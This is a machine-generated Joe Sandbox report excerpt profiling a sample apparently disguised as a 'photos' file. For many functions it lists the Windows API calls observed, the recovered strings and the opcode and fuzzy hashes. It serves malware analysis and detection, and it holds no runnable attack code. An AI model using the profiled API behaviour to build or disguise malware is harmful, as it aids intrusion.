                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: 6a0cef7037a18b60a90497dfae984afe27bc3fdbcfebbb2e35c82cd700f299b1
                                                                      • Instruction ID: c13161a0382a4556abfdd0d05ad5802f8d87f0937c619f909746ace3c85b68e4
                                                                      • Opcode Fuzzy Hash: 6a0cef7037a18b60a90497dfae984afe27bc3fdbcfebbb2e35c82cd700f299b1
                                                                      • Instruction Fuzzy Hash: 81E06D712513287AE7305B629C0EEFB3E6CEF47BB1F185019B109D11A0EAA0C800C2F0
                                                                      APIs
                                                                        • Part of subcall function 00D2AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D2AB19
                                                                        • Part of subcall function 00D2AABF: SelectObject.GDI32(?,00000000), ref: 00D2AB28
                                                                        • Part of subcall function 00D2AABF: BeginPath.GDI32(?), ref: 00D2AB3F
                                                                        • Part of subcall function 00D2AABF: SelectObject.GDI32(?,00000000), ref: 00D2AB68
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DA8779
                                                                      • LineTo.GDI32(?,?,?), ref: 00DA8786
                                                                      • EndPath.GDI32(?), ref: 00DA8796
                                                                      • StrokePath.GDI32(?), ref: 00DA87A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: be2904acf031c3ddf63611ceb5a43581c10c922a3923ca7d7759100e012d8e19
                                                                      • Instruction ID: ed7904f83daea5a1880137805ae726c1814cced13f433765d9846791fab20b23
                                                                      • Opcode Fuzzy Hash: be2904acf031c3ddf63611ceb5a43581c10c922a3923ca7d7759100e012d8e19
                                                                      • Instruction Fuzzy Hash: 75F05E36145358BBDB126F94AC09FCE3F59AF07320F588001FA11A52E2CB755511DFB9
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00D2AD4C
                                                                      • SetTextColor.GDI32(?,?), ref: 00D2AD56
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00D2AD69
                                                                      • GetStockObject.GDI32(00000005), ref: 00D2AD71
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 4037423528-0
                                                                      • Opcode ID: 2b5b3b26aa2718bf9b20dea5a1d67528981324b508a984db0ee34453488d87b8
                                                                      • Instruction ID: b06afca408b1e0a31c5b511b5c7469c699ddadb90f6a4014ae0659a5bff5b537
                                                                      • Opcode Fuzzy Hash: 2b5b3b26aa2718bf9b20dea5a1d67528981324b508a984db0ee34453488d87b8
                                                                      • Instruction Fuzzy Hash: 72E06D31654784AFDB215B74BC09BD83B60EB1333AF088219F6BA881E1C37299819B31
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00D71578
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D7111D), ref: 00D7157F
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D7111D), ref: 00D7158C
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D7111D), ref: 00D71593
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 51561255ad7d153b06d7e27b73ef1adce2c9db3015a62e5c98bcb24e5f8cb804
                                                                      • Instruction ID: 5c84ee0573a7ba76a37750e39719f354cbfd225145609f73012eb4c5cfa85494
                                                                      • Opcode Fuzzy Hash: 51561255ad7d153b06d7e27b73ef1adce2c9db3015a62e5c98bcb24e5f8cb804
                                                                      • Instruction Fuzzy Hash: 20E04F356113119BD6201BB4AD0CB563BB89F467A6F148404A24AC9190E66844408775
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00D6E008
                                                                      • GetDC.USER32(00000000), ref: 00D6E012
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D6E01E
                                                                      • ReleaseDC.USER32(?), ref: 00D6E03F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 58ec106596f9f33bb2ace3e776fb81be6878cb2fe26020648886dc61e9e83d4d
                                                                      • Instruction ID: 18c106d8f9f4222bd4953864223557ef2f40119e42d9d1d505ba1b33dc38bc4d
                                                                      • Opcode Fuzzy Hash: 58ec106596f9f33bb2ace3e776fb81be6878cb2fe26020648886dc61e9e83d4d
                                                                      • Instruction Fuzzy Hash: 39E012B1810300EFCB01DFA0D908AADBBF1EB48320B18A408E84AE3320DB385A419F20
                                                                      APIs
                                                                        • Part of subcall function 00D18FA0: _wcslen.LIBCMT ref: 00D18FA5
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00D84DF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: 472c12509b82fc1cfb767977c9054375f1c48fc69f448770572d456042ee5c0a
                                                                      • Instruction ID: 61de21df863cc6286a99a120cb7588f4817135be02f50f15be76cf3cfdf4feb5
                                                                      • Opcode Fuzzy Hash: 472c12509b82fc1cfb767977c9054375f1c48fc69f448770572d456042ee5c0a
                                                                      • Instruction Fuzzy Hash: AC915C75A00215AFCB15EF54C484EA9BBF5FF44304F198099E9469F362CB71EE86CBA0
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00D3E29D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: 88bd8e01ab76d0da605d6891c67537b029ebfb77c488516f9456bed3f9c6469f
                                                                      • Instruction ID: 5dafdf1550c0927a72fa29cc17d29cc9797641c9be4821d6cd50deffc21f2dee
                                                                      • Opcode Fuzzy Hash: 88bd8e01ab76d0da605d6891c67537b029ebfb77c488516f9456bed3f9c6469f
                                                                      • Instruction Fuzzy Hash: 83515B65A1C202D7CB117724C94237B6BA8EF40741F384FA8F4D1822E9DB34CC919ABA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: 9f0293c5ac504edf90372c63e6c5dad5c71c290c1cead08e6d15feedab90a480
                                                                      • Instruction ID: d7da976a9e608002c3ef1c1eb3d73ff0d8a0f0dca837c1e1f1780b591b7422d2
                                                                      • Opcode Fuzzy Hash: 9f0293c5ac504edf90372c63e6c5dad5c71c290c1cead08e6d15feedab90a480
                                                                      • Instruction Fuzzy Hash: AC51EF35504246ABCF259F29E480AFA7BB0EF16311F28405AFC919B290DA359D9ACB70
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00D2F381
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D2F39A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: a514eb554c51fc91c790d340066367fe3f4060e985ba3eb0884b7ce01828e3c7
                                                                      • Instruction ID: 5fc0cb9c8190adf8d1260d9a6082505e93a731f4737fd68a1f135118c0459d5c
                                                                      • Opcode Fuzzy Hash: a514eb554c51fc91c790d340066367fe3f4060e985ba3eb0884b7ce01828e3c7
                                                                      • Instruction Fuzzy Hash: 27513771418745ABD320AF11E886BABBBE8FFC5340F81885DF599811A1DF308469CB76
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: 1c845141b472340b0db9623e771712460ca2d58913759415d81f5f9fc3acc2b7
                                                                      • Instruction ID: 00f8ebf0849601b23a739ee78d9ee29cf273c4d075b54b67b4927f0eb7029ce4
                                                                      • Opcode Fuzzy Hash: 1c845141b472340b0db9623e771712460ca2d58913759415d81f5f9fc3acc2b7
                                                                      • Instruction Fuzzy Hash: FA41AE71A00205DFCF05EFA8E8858EEBBB5EF59324F544029E406A7251EB719E81CBB0
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00D8D04E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D8D058
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 240a6d6e02986d78426798543b58bcc5b9c82a9025ffe0b50d1cf1a7632720f0
                                                                      • Instruction ID: 234e49998dc89809996e36bd2db864b12f5be435fc9da4b843d979080bab925d
                                                                      • Opcode Fuzzy Hash: 240a6d6e02986d78426798543b58bcc5b9c82a9025ffe0b50d1cf1a7632720f0
                                                                      • Instruction Fuzzy Hash: BE312C71901209AFCF11EFA4EC859EEBFB9FF04340F004029F815A61A6DB319A56DB70
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00DA3554
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DA358F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: 8c0dff5386fbbc5e110e4723ee8788759a4c6f6e7674cca67e1d3848f3a8408d
                                                                      • Instruction ID: 9b86fc2e7f89e8185975b8b81b29995937707242f4d0aaccf9ea0cd1a4f10110
                                                                      • Opcode Fuzzy Hash: 8c0dff5386fbbc5e110e4723ee8788759a4c6f6e7674cca67e1d3848f3a8408d
                                                                      • Instruction Fuzzy Hash: C4317E71110604AADB10DF68DC81EFB73BAFF49724F149619F9A587190DA70ED81DB70
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DA4554
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DA4569
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: 646147192692ee9b6938345f220c00de6dc337efdaba1dec7576afab1aff244a
                                                                      • Instruction ID: 9ec0ec9b31dfe736b0e50e5615c7c12e0e2153a7d4751302c50fe5ff17ed8bfa
                                                                      • Opcode Fuzzy Hash: 646147192692ee9b6938345f220c00de6dc337efdaba1dec7576afab1aff244a
                                                                      • Instruction Fuzzy Hash: 56310775E013099FDB14DFA9D990BEA7BB5FB4A300F14416AE904AB351D7B0E941CFA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DA31AF
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA31BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: 6cd648020a0ad88686ea5c1fff61daabeb8a09c42fc52d799c0827c1aed19177
                                                                      • Instruction ID: 2402a063bda0dcb8fdfa8872d1a39c411e1ffb13b428d81bf4030d35068d5b81
                                                                      • Opcode Fuzzy Hash: 6cd648020a0ad88686ea5c1fff61daabeb8a09c42fc52d799c0827c1aed19177
                                                                      • Instruction Fuzzy Hash: EC11DD723003086FEF258F14DC80EAB37ABEB8A3A4F144124F9189B290D631ED5187B0
                                                                      APIs
                                                                        • Part of subcall function 00D179B6: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D179F4
                                                                        • Part of subcall function 00D179B6: GetStockObject.GDI32(00000011), ref: 00D17A08
                                                                        • Part of subcall function 00D179B6: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D17A12
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00DA36AD
                                                                      • GetSysColor.USER32(00000012), ref: 00DA36C7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 958ad45ba42696eddf4ef38b601e986b7bb49c5c7dcf512d107ad38a53c18a94
                                                                      • Instruction ID: aa49e4c6059196b2839251edcec9f49f2854ba93d8af2e18e35710c44fb90a51
                                                                      • Opcode Fuzzy Hash: 958ad45ba42696eddf4ef38b601e986b7bb49c5c7dcf512d107ad38a53c18a94
                                                                      • Instruction Fuzzy Hash: 1F113772610209AFDB00DFA8CC45EEA7BB9FB09354F184914FD96E3250E775E854DB60
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D8CC9B
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D8CCC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 89508b771fca70a03bc25740085032a84739ed27841f2c3f7d49583d39eec51d
                                                                      • Instruction ID: 8606c84ca16458417260819f6fc56c86b26806f6cfd9f327e7bfff25f4dbfab2
                                                                      • Opcode Fuzzy Hash: 89508b771fca70a03bc25740085032a84739ed27841f2c3f7d49583d39eec51d
                                                                      • Instruction Fuzzy Hash: 0E11C271221632FAD7385B668C49EF7BE9CEB127A4F00921AB15E93180D6709844C7F0
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00DA33DE
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DA33ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 4c460b151835efe0cd7ae22aef8c85a4d69fbf3d76d46f8a050d691cc9c9f300
                                                                      • Instruction ID: 843aec61746e61d7e6fa3d806dce66ccda3c38cf3d38f8db70fbf62dca00dfc5
                                                                      • Opcode Fuzzy Hash: 4c460b151835efe0cd7ae22aef8c85a4d69fbf3d76d46f8a050d691cc9c9f300
                                                                      • Instruction Fuzzy Hash: 60119D31514204AFEF108F64DC84AAB3B6AEB16374F144714F960932E0CB71DC509BB0
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00D76C0C
                                                                      • _wcslen.LIBCMT ref: 00D76C18
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
